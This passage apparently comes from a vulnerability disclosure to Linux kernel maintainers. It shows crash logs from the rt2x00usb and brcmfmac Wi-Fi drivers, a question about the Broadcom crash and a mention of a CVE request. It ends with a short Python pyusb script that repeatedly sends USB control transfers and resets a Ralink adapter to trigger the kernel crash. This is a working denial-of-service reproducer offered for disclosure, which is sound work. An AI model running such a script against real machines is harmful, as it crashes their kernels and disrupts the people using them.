[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000002] ? syscall_exit_to_user_mode+0x37/0x60
[ +0.000002] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000003] ? do_syscall_64+0x61/0x90
[ +0.000001] ? do_syscall_64+0x61/0x90
[ +0.000003] entry_SYSCALL_64_after_hwframe+0x73/0xdd
[ +0.000002] RIP: 0033:0x7bfb4872799d
[ +0.000005] Code: 28 89 54 24 1c 48 89 74 24 10 89 7c 24 08 e8 6a 90 f6 ff 8b 54 24 1c 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 33 44 89 c7 48 89 44 24 08 e8 ae 90 f6 ff 48
[ +0.000001] RSP: 002b:00007ffd73cd3280 EFLAGS: 00000293 ORIG_RAX: 000000000000002e
[ +0.000003] RAX: ffffffffffffffda RBX: 00000000000004a3 RCX: 00007bfb4872799d
[ +0.000001] RDX: 0000000000000000 RSI: 00007ffd73cd32c0 RDI: 000000000000000c
[ +0.000002] RBP: 000055d422a2e030 R08: 0000000000000000 R09: 0000000000000000
[ +0.000001] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000000
[ +0.000001] R13: 00007ffd73cd3410 R14: 00007ffd73cd340c R15: 0000000000000000
[ +0.000004] </TASK>
[ +0.000001] Modules linked in: rt2800usb rt2x00usb rt2800lib rt2x00lib tcp_diag inet_diag bnep nfnetlink_queue nfnetlink_log bluetooth ecdh_generic ecc usbmon nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter ccm xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg mt7921u mt76x2u snd_intel_sdw_acpi mt7921_common mt76x2_common edac_mce_amd amdgpu snd_hda_codec mt76_connac_lib mt76x02_usb mt76x02_lib mt76_usb snd_hda_core kvm_amd snd_hwdep mt76 binfmt_misc kvm snd_pcm irqbypass mac80211 crct10dif_pclmul snd_seq_midi amdxcp polyval_clmulni snd_seq_midi_event iommu_v2 polyval_generic drm_buddy ghash_clmulni_intel sha256_ssse3 snd_rawmidi gpu_sched sha1_ssse3 drm_suballoc_helper aesni_intel drm_ttm_helper nls_iso8859_1 ttm crypto_simd
[ +0.000056] snd_seq cryptd cfg80211 drm_display_helper snd_seq_device snd_timer cec rapl rc_core joydev input_leds libarc4 drm_kms_helper eeepc_wmi snd wmi_bmof i2c_algo_bit k10temp soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci libahci nvme_core xhci_pci_renesas realtek nvme_common wmi
[ +0.000037] CR2: 00000000000011b0
[ +0.000002] ---[ end trace 0000000000000000 ]---
[ +0.164871] RIP: 0010:rt2x00usb_clear_entry+0x5/0x40 [rt2x00usb]
[ +0.000008] Code: d2 31 c9 31 f6 31 ff 45 31 c0 e9 e6 1a 90 e5 66 0f 1f 44 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 <48> 8b 47 10 48 c7 07 00 00 00 00 83 78 10 0e 74 0b 31 c0 31 f6 31
[ +0.000003] RSP: 0018:ffffb0fe4126f5e0 EFLAGS: 00010206
[ +0.000003] RAX: ffffffffc20411f0 RBX: 000000000000005f RCX: 0000000000000000
[ +0.000002] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000000011a0
[ +0.000003] RBP: ffffb0fe4126f600 R08: 0000000000000000 R09: 0000000000000000
[ +0.000002] R10: 0000000000000000 R11: 0000000000000000 R12: ffff919567fab4f0
[ +0.000002] R13: ffff9198efd9e060 R14: ffff9198efd9c900 R15: ffff9196786a4000
[ +0.000002] FS: 00007bfb476a34c0(0000) GS:ffff91a42ee00000(0000) knlGS:0000000000000000
[ +0.000002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000002] CR2: 00000000000011b0 CR3: 000000011e4ce000 CR4: 00000
There is another point that we do not quite understand. We also triggered this vulnerability on a Broadcom network card. However, the kernel message indicated that the issue was due to the brcmfmac firmware. Using lsusb, we discovered that this chip also uses the rt2x00 chipset. Could you please clarify whether you can address this issue as well, or should we notify Broadcom?
----------------------------- Broadcom crash log"
[ +0.709539] usb 3-1.4: reset high-speed USB device number 8 using xhci_hcd
[ +0.133374] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available (err=-2), device may have limited channels available
[ +0.000007] brcmfmac: brcmf_c_process_txcap_blob: no txcap_blob available (err=-2)
[ +0.000742] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43236/3 wl0: Nov 30 2011 17:33:42 version 5.90.188.22
[ +0.056253] usb 3-1.4 wlxbc307eab1237: renamed from wlan0
[ +0.024459] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000006] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.003143] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.000003] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000001] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.003414] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.013322] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.000047] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000002] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.001726] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000003] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.000053] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000002] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.005724] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.082551] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000007] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.002798] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.009268] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000005] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.037693] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000007] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.004651] ieee80211 phy33: brcmf_cfg80211_escan_handler: scan not ready, bsscfgidx=0
[ +0.000004] ieee80211 phy33: brcmf_fweh_event_worker: event handler failed (69)
[ +0.740682] usb 3-1.4: reset high-speed USB device number 8 using xhci_hcd
[ +0.135285] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available (err=-2), device may have limited channels available
[ +0.000007] brcmfmac: brcmf_c_process_txcap_blob: no txcap_blob available (err=-2)
[ +0.000741] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM43236/3 wl0: Nov 30 2011 17:33:42 version 5.90.188.22
[ +0.015434] BUG: kernel NULL pointer dereference, address: 0000000000000360
[ +0.000004] #PF: supervisor read access in kernel mode
[ +0.000002] #PF: error_code(0x0000) - not-present page
[ +0.000003] PGD 0 P4D 0
[ +0.000006] Oops: 0000 [#1] PREEMPT SMP NOPTI
[ +0.000005] CPU: 0 PID: 19093 Comm: kworker/0:4 Tainted: G OE 6.5.0-41-generic #41~22.04.2-Ubuntu
[ +0.000005] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 3603 03/20/2021
[ +0.000003] Workqueue: events brcmf_fweh_event_worker [brcmfmac]
[ +0.000024] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000017] Code: 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 20 4c 8b 17 44 8b 6e 08 4d 8b 72 20 41 83 fd 04 74 67 <49> 8b 86 60 03 00 00 48 89 fb a8 01 0f 84 b9 02 00 00 41 83 fd 08
[ +0.000003] RSP: 0018:ffffb44e061fbd20 EFLAGS: 00010202
[ +0.000003] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: ffffb44e061fbde8
[ +0.000003] RDX: ffff9456d574f450 RSI: ffffb44e061fbde8 RDI: ffff94582e9759c0
[ +0.000002] RBP: ffffb44e061fbd68 R08: ffff9456d574f450 R09: 0000000000000000
[ +0.000003] R10: ffff9458bce3c900 R11: 0000000000000000 R12: 0000000000000045
[ +0.000002] R13: 0000000000000008 R14: 0000000000000000 R15: 0000000000000045
[ +0.000003] FS: 0000000000000000(0000) GS:ffff9465aea00000(0000) knlGS:0000000000000000
[ +0.000003] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000002] CR2: 0000000000000360 CR3: 0000000210812000 CR4: 0000000000750ef0
[ +0.000003] PKRU: 55555554
[ +0.000002] Call Trace:
[ +0.000003] <TASK>
[ +0.000004] ? show_regs+0x6d/0x80
[ +0.000007] ? __die+0x24/0x80
[ +0.000005] ? page_fault_oops+0x99/0x1b0
[ +0.000006] ? do_user_addr_fault+0x31d/0x6b0
[ +0.000005] ? exc_page_fault+0x83/0x1b0
[ +0.000006] ? asm_exc_page_fault+0x27/0x30
[ +0.000008] ? brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000016] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000005] ? psi_group_change+0x230/0x570
[ +0.000006] ? __pfx_brcmf_cfg80211_escan_handler+0x10/0x10 [brcmfmac]
[ +0.000016] brcmf_fweh_call_event_handler+0x5c/0x110 [brcmfmac]
[ +0.000018] brcmf_fweh_event_worker+0x89/0x320 [brcmfmac]
[ +0.000016] ? raw_spin_rq_unlock+0x10/0x40
[ +0.000004] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000004] ? finish_task_switch.isra.0+0x85/0x2a0
[ +0.000006] process_one_work+0x240/0x450
[ +0.000006] worker_thread+0x50/0x3f0
[ +0.000004] ? srso_alias_return_thunk+0x5/0x7f
[ +0.000005] ? __pfx_worker_thread+0x10/0x10
[ +0.000004] kthread+0xf2/0x120
[ +0.000005] ? __pfx_kthread+0x10/0x10
[ +0.000004] ret_from_fork+0x47/0x70
[ +0.000005] ? __pfx_kthread+0x10/0x10
[ +0.000005] ret_from_fork_asm+0x1b/0x30
[ +0.000007] </TASK>
[ +0.000003] Modules linked in: brcmfmac_wcc brcmfmac brcmutil nf_conntrack_netlink xfrm_user xfrm_algo xt_addrtype br_netfilter xt_CHECKSUM xt_MASQUERADE xt_conntrack ipt_REJECT nf_reject_ipv4 xt_tcpudp nft_compat nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) nf_tables libcrc32c nfnetlink bridge stp llc overlay intel_rapl_msr intel_rapl_common snd_hda_codec_realtek rt2800usb snd_hda_codec_generic snd_hda_codec_hdmi rt2x00usb edac_mce_amd rt2800lib snd_hda_intel snd_intel_dspcfg rt2x00lib snd_intel_sdw_acpi kvm_amd snd_hda_codec amdgpu mac80211 snd_hda_core snd_hwdep kvm binfmt_misc snd_pcm irqbypass amdxcp crct10dif_pclmul snd_seq_midi iommu_v2 cfg80211 nls_iso8859_1 polyval_clmulni snd_seq_midi_event drm_buddy polyval_generic ghash_clmulni_intel libarc4 input_leds joydev gpu_sched sha256_ssse3 snd_rawmidi sha1_ssse3 drm_suballoc_helper drm_ttm_helper aesni_intel ttm crypto_simd snd_seq cryptd drm_display_helper snd_seq_device rapl snd_timer cec rc_core snd
[ +0.000101] eeepc_wmi wmi_bmof drm_kms_helper k10temp i2c_algo_bit soundcore ccp mac_hid sch_fq_codel msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_logitech_hidpp hid_logitech_dj hid_generic usbhid hid mfd_aaeon asus_wmi video ledtrig_audio sparse_keymap platform_profile crc32_pclmul nvme ahci i2c_piix4 r8169 xhci_pci nvme_core libahci xhci_pci_renesas realtek nvme_common wmi
[ +0.000053] CR2: 0000000000000360
[ +0.000003] ---[ end trace 0000000000000000 ]---
[ +0.289680] RIP: 0010:brcmf_cfg80211_escan_handler+0x27/0x380 [brcmfmac]
[ +0.000044] Code: 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 53 48 83 ec 20 4c 8b 17 44 8b 6e 08 4d 8b 72 20 41 83 fd 04 74 67 <49> 8b 86 60 03 00 00 48 89 fb a8 01 0f 84 b9 02 00 00 41 83 fd 08
[ +0.000005] RSP: 0018:ffffb44e061fbd20 EFLAGS: 00010202
[ +0.000005] RAX: 0000000000000000 RBX: ffff94582e9759c0 RCX: ffffb44e061fbde8
[ +0.000004] RDX: ffff9456d574f450 RSI: ffffb44e061fbde8 RDI: ffff94582e9759c0
[ +0.000003] RBP: ffffb44e061fbd68 R08: ffff9456d574f450 R09: 0000000000000000
[ +0.000003] R10: ffff9458bce3c900 R11: 0000000000000000 R12: 0000000000000045
[ +0.000003] R13: 0000000000000008 R14: 0000000000000000 R15: 0000000000000045
[ +0.000003] FS: 0000000000000000(0000) GS:ffff9465aea00000(0000) knlGS:0000000000000000
[ +0.000004] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ +0.000004] CR2: 0000000000000360 CR3: 0000000210812000 CR4: 0000000000750ef0
[ +0.000003] PKRU: 55555554
[ +0.000003] note: kworker/0:4[19093] exited with irqs disabled
[ +0.036443] usb 3-1.4 wlxbc307eab1237: renamed from wlan0
[ +0.726413] ieee80211 phy34: brcmf_fil_cmd_data: bus is down. we have nothing to do.
[ +0.000010] ieee80211 phy34: brcmf_notify_escan_complete: Scan abort failed
Here is the final part of the translation, including your request for a CVE assignment:
import usb.core
import usb.util
import time
import random
dev = usb.core.find(idVendor=0x148f, idProduct=0x3572)
if dev is None:
raise ValueError("Device not found")
def send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length):
try:
data = bytes([0xFF] * data_length)
print(
f"Sending: bmRequestType={bmRequestType}, bRequest={bRequest}, wValue={wValue}, wIndex={wIndex}, data={data}")
send = dev.ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data)
except Exception as e:
print(f"Error: {e}")
requests = [
(0x00, 0x00, 0x0000, 0x0000, 1),
]
for i in range(100):
for bmRequestType, bRequest, wValue, wIndex, data_length in requests:
send_ctrl_transfer(bmRequestType, bRequest, wValue, wIndex, data_length)
time.sleep(0.1)
dev.reset()
